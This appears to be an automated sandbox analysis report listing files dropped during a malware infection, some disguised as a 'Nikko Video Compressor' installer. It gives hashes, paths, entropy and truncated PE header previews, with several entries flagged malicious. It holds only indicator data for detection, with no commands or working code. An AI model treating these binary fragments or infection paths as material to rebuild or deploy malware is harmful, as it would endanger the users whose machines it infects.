                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):392048
                                                                                                                                                                                                                                        Entropy (8bit):6.542831007177094
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:1eIwnft+S34NVSTjMFR+oVbKQfbno1/1oz6i2EDSD4I+XdtQXGMiFcoOjAWcIhbl:1eIwnft+S34NVSTQD+oVbKQfrC/1ct25
                                                                                                                                                                                                                                        MD5:EE856A00410ECED8CC609936D01F954E
                                                                                                                                                                                                                                        SHA1:705D378626AEC86FECFDF04C86244006BC3AF431
                                                                                                                                                                                                                                        SHA-256:B6192300D3C1476EF3C25A368D055AA401035E78F9F6DBE5F93C84D36EF1FA62
                                                                                                                                                                                                                                        SHA-512:666D731247DAEAE4B57925DFA8CAE845327FD34E0F6B9AAD1BCF471D1800D7E8AF5642A5FB6E0EC58BA3AC7DD98A6D3FE0B473F34C16FFB9985621C98C0463EF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.v[N.%[N.%[N.%4*.$QN.%4*.$.N.%4*.$IN.%4*.$YN.%.*.$HN.%.*.$GN.%.*.$KN.%.*.$XN.%[N.%.O.%.*.$iN.%.*.$ZN.%.*e%ZN.%.*.$ZN.%Rich[N.%........PE..L...D.r^...........!.....8..........^7.......P......................................'.....@..........................6..<)..L_..<.......X...............p3.......3..@,..............................`,..@............P...............................text....7.......8.................. ..`.rdata..l....P.......<..............@..@.data....?...p...6...X..............@....rsrc...X...........................@..@.reloc...3.......4..................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):719521
                                                                                                                                                                                                                                        Entropy (8bit):6.515816318838982
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:TQszP8NRMXpc/rPx37/zHBA66pE+4p1YR71CERdH6rN9byxHaOMe3mxyF/:TQQP8YXpc/rPx37/zHBA6plp+51CErdn
                                                                                                                                                                                                                                        MD5:5AA0D5DFD8F32EF2F329923506B64E50
                                                                                                                                                                                                                                        SHA1:3F26B5DC3EFC27D4CCE60FC23B05A34FBCF293E9
                                                                                                                                                                                                                                        SHA-256:7F7EBDD0095F53AA817B0E9CAF6AD5F94D6132B42CED75AB1008D928D94D9EEE
                                                                                                                                                                                                                                        SHA-512:DBD28DC92F2915EA8D94FFB15832B877F728C3E42F9CCF84F7E666A337D725F9714D812ADFFF62FDA50F0FEF46E43AE1109FDA57DF8C12FC12C4076F4C5D5B39
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.........................................@..............................................@...............................%........................................................... ......................................................CODE....,........................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata....... ......................@..P.reloc..(....0......................@..P.rsrc...............................@..P.....................Z..............@..P........................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp
                                                                                                                                                                                                                                        File Type:InnoSetup Log Nikko Video Compressor, version 0x30, 4528 bytes, 580913\user, "C:\Users\user\AppData\Local\Nikko Video Compressor"
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4528
                                                                                                                                                                                                                                        Entropy (8bit):4.636189194530859
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:5/dWIl4488GpZPtoDWX9H+eOIhcfgi4cVSQs0LJqjpUyHGaoVq1l:5/dWY448JpptoLHIhcfccVSQ1Jq9UyHt
                                                                                                                                                                                                                                        MD5:CB9E92A26165CF40F351498D7EB998B1
                                                                                                                                                                                                                                        SHA1:573F7AEA54E3B1A4B7D7FA1D2A5A2CFF64838D4C
                                                                                                                                                                                                                                        SHA-256:45E830C62C90459FC6170A0B824C1C490213011DC1B97A8BCFA8BBEB89E8AFFE
                                                                                                                                                                                                                                        SHA-512:331727D5D52D958A8C29E6762B5F1DFF90DD1233EC82A943C528E40374624ACC7B4FC869B206B1750874AC25155E82979F9D84279504EE0B0CE955CD61898F97
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:Inno Setup Uninstall Log (b)....................................Nikko Video Compressor..........................................................................................................Nikko Video Compressor..........................................................................................................0...........%..........................................................................................................................ID........Q....580913.user2C:\Users\user\AppData\Local\Nikko Video Compressor...........0.#.k.. .....P......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User3
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):719521
                                                                                                                                                                                                                                        Entropy (8bit):6.515816318838982
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:TQszP8NRMXpc/rPx37/zHBA66pE+4p1YR71CERdH6rN9byxHaOMe3mxyF/:TQQP8YXpc/rPx37/zHBA6plp+51CErdn
                                                                                                                                                                                                                                        MD5:5AA0D5DFD8F32EF2F329923506B64E50
                                                                                                                                                                                                                                        SHA1:3F26B5DC3EFC27D4CCE60FC23B05A34FBCF293E9
                                                                                                                                                                                                                                        SHA-256:7F7EBDD0095F53AA817B0E9CAF6AD5F94D6132B42CED75AB1008D928D94D9EEE
                                                                                                                                                                                                                                        SHA-512:DBD28DC92F2915EA8D94FFB15832B877F728C3E42F9CCF84F7E666A337D725F9714D812ADFFF62FDA50F0FEF46E43AE1109FDA57DF8C12FC12C4076F4C5D5B39
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.........................................@..............................................@...............................%........................................................... ......................................................CODE....,........................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata....... ......................@..P.reloc..(....0......................@..P.rsrc...............................@..P.....................Z..............@..P........................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):2801664
                                                                                                                                                                                                                                        Entropy (8bit):6.704411900002309
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:UtkjTCvq/irWfqk7ibFuToinSryh3UgXUID83EIQCw6xVw6:Ut1q/IWfqk7ibFu0iL3+4wQCw6xl
                                                                                                                                                                                                                                        MD5:8C1835DABEA53E9D98E866C950CD260D
                                                                                                                                                                                                                                        SHA1:8676E818D7A45503B906FD0F3CF4B0EDAF5AC8FC
                                                                                                                                                                                                                                        SHA-256:B9B88394BC3C964540130E4B5D0A9AC339DC0BBAC35F418EAB872674D5E07AB7
                                                                                                                                                                                                                                        SHA-512:1444879EA6CFBA3ED187DB1D084425202D9789A38B87D6CC306E1DFDE4246F1C83757581DE7726788C2B2C1C95D8C2E5C19B7E2F352DF12AA6FB52211BB289BB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d{.L..................".........d."......."...@...........................*.....).+.......................................".@.....#.XZ............................................................................"..............................text.....".......".................`....rdata...C...."..P....".............@..@.data...xT...0#..0...0#.............@....rsrc....`....#..`...`#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):310109184
                                                                                                                                                                                                                                        Entropy (8bit):0.056647913043850126
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:e2JIkJBboEeCn8fhE85ha+M9uf5ThdA2j9Rz8OyI:e2FMhE858Q5lfz
                                                                                                                                                                                                                                        MD5:0294A0680BC67B4737AFC0B88A35AB69
                                                                                                                                                                                                                                        SHA1:94BE4B5F2202EFE2ED64154D04738E677B604C37
                                                                                                                                                                                                                                        SHA-256:949E7AD9D707D83A5BEA025B66423D9F121515618086449D872FFCC19BB7B12C
                                                                                                                                                                                                                                        SHA-512:0498CC8C9D9917EC6C8252BEF0D0C3DBA80360E5D6BA56A7F207931CCED9A8D8CC26862835DD925D79DFF29F723D634D9EEE461E965EBC873FDD6140952387B6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....|.f...........#...#.H...@...............`.....b.....................................@... .........................`....................................0..........................................................t............................text...<F.......H..................`.P`.data........`.......L..............@.`..rdata..@............b..............@.`@.eh_fram.....P.......&..............@.0@.bss....t.............................`..edata..`...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls......... ......................@.0..reloc.......0......................@.0B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1075200
                                                                                                                                                                                                                                        Entropy (8bit):7.828820550765554
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:8C8AF20BF6536903C1D042CEBEDE6475
                                                                                                                                                                                                                                        SHA1:8EF42ABC3AD478F6D8C17691FE4CC1975CA43684
                                                                                                                                                                                                                                        SHA-256:B15BDB0A4D7F265CF4ED7C46668F4CA247347CA2CE4A7689CB8DBB25863F294A
                                                                                                                                                                                                                                        SHA-512:8F68E5302D07FB74DDE0E42E0D370E1CB7C1D6B0372633FCFAAB95CD1D12F9786C4E44E71B3CC98EEEB60EA10F54497773C3B4AA58AFA5297FAD93A3F11097E0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..@...&.......^... ...`....@.. ...............................D....@..................................]..O....`..F#...........................]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc...F#...`...$...B..............@..@.reloc...............f..............@..B.................]......H........D...J..............`.............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r)..p~....o-...(......t.....+..*Vs....(/...t.........*..(0...*.0..........
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2662
                                                                                                                                                                                                                                        Entropy (8bit):7.8230547059446645
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                                                                                                                                                                                        SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                                                                                                                                                                                        SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                                                                                                                                                                                        SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2662
                                                                                                                                                                                                                                        Entropy (8bit):7.8230547059446645
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                                                                                                                                                                                        SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                                                                                                                                                                                        SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                                                                                                                                                                                        SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1048575
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:818DB642C70FEBED6218762BCF3CA3ED
                                                                                                                                                                                                                                        SHA1:596B50BD016897E8AE48E7A77C85E2057490E891
                                                                                                                                                                                                                                        SHA-256:204D6A72E295B2D04BCDA51C0DC2E8D6F5B08B4152A659391EA4389DA2905007
                                                                                                                                                                                                                                        SHA-512:9073D733828F7865C5B13ACD13F161FDDAF7017B7E1C7A1C886C642EE75F9924833AE9C15EFD3244D17CDB1EA4D30F95E0A2EAB261AA882C6C3B8E90602880BB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
                                                                                                                                                                                                                                        Process:C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):708096
                                                                                                                                                                                                                                        Entropy (8bit):6.507423175839584
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:010CD22508FA12015E83A39FEB2DB9AA
                                                                                                                                                                                                                                        SHA1:4ECBD1FDE23ABA22FB6A871E0D4F9C4BA4319432
                                                                                                                                                                                                                                        SHA-256:0DB9239768D6A31781C9E636296D3F77F39EB8903AD3AFB6BE3D9117B62E2E1E
                                                                                                                                                                                                                                        SHA-512:C34777C94B5CE326ADAEA57FC142012D6BDAE9D6869E824C9F22D1EDF28892C4E3DEB47D93EEA661567D5411629FDE2B4FDD14516A52F6771549AD018FC16B79
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.........................................@..............................................@...............................%........................................................... ......................................................CODE....,........................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata....... ......................@..P.reloc..(....0......................@..P.rsrc...............................@..P.....................Z..............@..P........................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2560
                                                                                                                                                                                                                                        Entropy (8bit):2.8818118453929262
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                                                                                                                                        SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                                                                                                                                        SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                                                                                                                                        SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6144
                                                                                                                                                                                                                                        Entropy (8bit):4.363359036723334
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:526426126AE5D326D0A24706C77D8C5C
                                                                                                                                                                                                                                        SHA1:68BAEC323767C122F74A269D3AA6D49EB26903DB
                                                                                                                                                                                                                                        SHA-256:B20A8D88C550981137ED831F2015F5F11517AEB649C29642D9D61DEA5EBC37D1
                                                                                                                                                                                                                                        SHA-512:A2D824FB08BF0B2B2CC0B5E4AF8B13D5BC752EA0D195C6D40FD72AEC05360A3569EADE1749BDAC81CFB075112D0D3CD030D40F629DAF7ABCC243F9D8DCA8BFBE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`..............................................................<!.......P.......@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):23312
                                                                                                                                                                                                                                        Entropy (8bit):4.596242908851566
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                                                                                                                                                        SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                                                                                                                                                        SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                                                                                                                                                        SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):314613760
                                                                                                                                                                                                                                        Entropy (8bit):0.002153493945743197
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:B7D419FC07617B934D9D062DB78C1B47
                                                                                                                                                                                                                                        SHA1:DEA8D4248A027927F0EE57B114BB98B60B776F7F
                                                                                                                                                                                                                                        SHA-256:3569B810E5FA7F87B796E56E5111605056E326ADC22029CF032709CF85D9386F
                                                                                                                                                                                                                                        SHA-512:3F75EBD2851D5DB3291F1825068EBBF2B590F9681BE4CC7E916578A056CE122656FEC0DB2595C5D8DCFC21BA945EA87650AB961527C7038EA32B039B0E9AE948
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{.f...............#.v........................@.......................................@... .................................................................h...................................................X................................text....u.......v..................`.P`.data...X............z..............@.0..rdata..X............|..............@.`@.eh_fram............................@.0@.bss..................................`..idata..............................@.0..CRT....4...........................@.0..tls................................@.0..reloc..h...........................@.0B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):144
                                                                                                                                                                                                                                        Entropy (8bit):5.255945210992157
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:88371DEF959A5A81F5EDFBA6BB5571A4
                                                                                                                                                                                                                                        SHA1:488D4B7DBB5650E0B6BF6C07F8CF01B451D0405D
                                                                                                                                                                                                                                        SHA-256:937D31B8C5E79F5AC78DEB0FB708BD4A4B3B98CA596FD87951FC0A76F380AB97
                                                                                                                                                                                                                                        SHA-512:FF51CD375C840024FD434015F38AEFBA9AE66A820ECA6F3446DEFE75C761CB3BB456F9D86D5F5DB3B0BFF495946AA4F327010DB17EC1B7FF4502541840CFE7CA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:["C:\\Users\\user\\Documents\\iofolko5\\Zt2eeOHcoNwxYT3C9R8h67os.exeM3rFKsjF1QTDth5a","C:\\ProgramData\\jewkkwnf\\jewkkwnf.exeWqTnzVEcT35t5u1k"]
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2251
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:0158FE9CEAD91D1B027B795984737614
                                                                                                                                                                                                                                        SHA1:B41A11F909A7BDF1115088790A5680AC4E23031B
                                                                                                                                                                                                                                        SHA-256:513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
                                                                                                                                                                                                                                        SHA-512:C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
